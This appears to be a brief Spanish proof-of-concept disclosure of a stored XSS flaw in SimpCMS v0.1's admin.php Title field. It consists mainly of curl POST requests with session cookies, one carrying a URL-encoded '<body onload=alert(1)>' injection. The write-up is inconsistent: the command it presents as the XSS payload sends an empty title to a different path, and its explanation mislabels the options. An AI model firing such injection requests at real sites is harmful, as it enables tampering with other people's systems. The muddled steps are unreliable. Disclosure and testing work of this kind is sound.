
Publicación para Cross Site Scripting (XSS) en SimpCMS v0.1 - /SimpCMS/admin.php
Una vulnerabilidad de cross-site scripting (XSS) en SimpCMS v0.1 permite a los atacantes ejecutar scripts web arbitrarios o HTML a través de un payload manipulado inyectado en el campo Title en /admin.php.
Tras iniciar sesión en la interfaz de administración de SimpCMS, copie los respectivos valores de Cookie observados en la pestaña Application del elemento Inspect del navegador y envíe la siguiente solicitud curl:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


Los parámetros iniciales observados para el software SimpCMS dieron como resultado el siguiente comando cURL, pero luego se actualizó:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explicación:
- curl: Herramienta de línea de comandos para transferir datos con URLs.
- -X POST: Especifica el método de solicitud a utilizar (POST).
- "http://site.com/SimpCMS/admin.php": La URL a la que se envía la solicitud.
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - El payload de la solicitud POST.
Ejecute este comando en su terminal para enviar la solicitud POST con el payload XSS. Visite el sitio principal de /SimpCMS y el XSS será visible.